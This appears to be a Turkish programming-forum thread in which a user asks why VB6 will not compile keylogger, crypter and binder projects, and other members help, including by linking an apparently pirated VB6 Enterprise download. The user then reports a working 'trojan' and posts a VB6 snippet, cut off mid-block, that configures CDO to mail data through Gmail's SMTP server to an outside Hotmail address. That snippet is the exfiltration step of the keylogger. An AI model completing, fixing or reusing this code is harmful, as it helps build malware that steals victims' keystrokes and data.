Vb6.0 Proje Make Exe Sorunu
-
Slm arkadaşlar ben vb6,0 portable kullanıyorum ilk önceleri "make exe" seçeneği kapalıydı ve yaptıgım projeleri .exe olarak kaydedemiyordum.Bir Forum sitesinden bunun Kayıt defteri ile ilgili oldugunu gördüm ve kayıt defterini indirdim düzeldi.Artık projelerim .exe olarak kaydedebiliodum.Fakat keylogeer,Crypter,Binder Gibi Projeleri .exe Yapamıyorum...sizce sorun portable olmasından mı kaynaklanıyordur.Make exe diyorum yapılıor dioo masa üstüne bakıyorum bişey yok...
ilginiz için teşekkürler.
-
muhtemelen portable olmasındandır. madem bu kadar uğraşıyon. full sürümünü niye kullanmıyorsunki
-
dostum full surumunu indirdim su an kullandıgım bilgisayara yemedi benim diğer pcye yuklemem lazım o kadar ugrasmak istemedim
-
Antivirus, microsoftun kendi koruması, vb gibi şeyler açıksa, exe oluştuğu an belki siliniyorduk otomatikman, çünkü virüs derliyorsun anladığım kadarıyla bir nevi ? :)
-
olabilir baskan :D...
-
gowand bunu yazdı:
-----------------------------dostum full surumunu indirdim su an kullandıgım bilgisayara yemedi benim diğer pcye yuklemem lazım o kadar ugrasmak istemedim
-----------------------------yemedi derken sorun nedir :)
-
SpArK bunu yazdı:
-----------------------------Antivirus, microsoftun kendi koruması, vb gibi şeyler açıksa, exe oluştuğu an belki siliniyorduk otomatikman, çünkü virüs derliyorsun anladığım kadarıyla bir nevi ? :)
-----------------------------kesinlikle bu yüzdendir benim başıma da geldi aynı problem..
-
http://www.tahribat.com/Forum-Microsoft-Visual-Basic-6-0-Enterprise-Edition-Katilimsiz-150259/
birde bunla dene hocam.
-
hepinize tskler bu yolları deniyeceğimmm
-
uzun uzun yazacaktımda neyse...
-
sorunu cozdum ama simdi baska bir sorunla karsı karsıyayım
trojan calısooo ama bir dakikadan sonra run time eror 48 dll sorunu verioo
Dim iMsg, iConf, Flds
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields "BURADA SORUN OLDUGUNU SÖYLÜYOR"
schema = "http://schemas.microsoft.com/cdo/configuration/"
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = "" ' Gmail ID miz
Flds.Item(schema & "sendpassword") = "" ' Gmail Şifremiz
Flds.Item(schema & "smtpusessl") = 1
Flds.Update
With iMsg
.To = "mailadresi@hotmail.com" ' Hotmail Destekli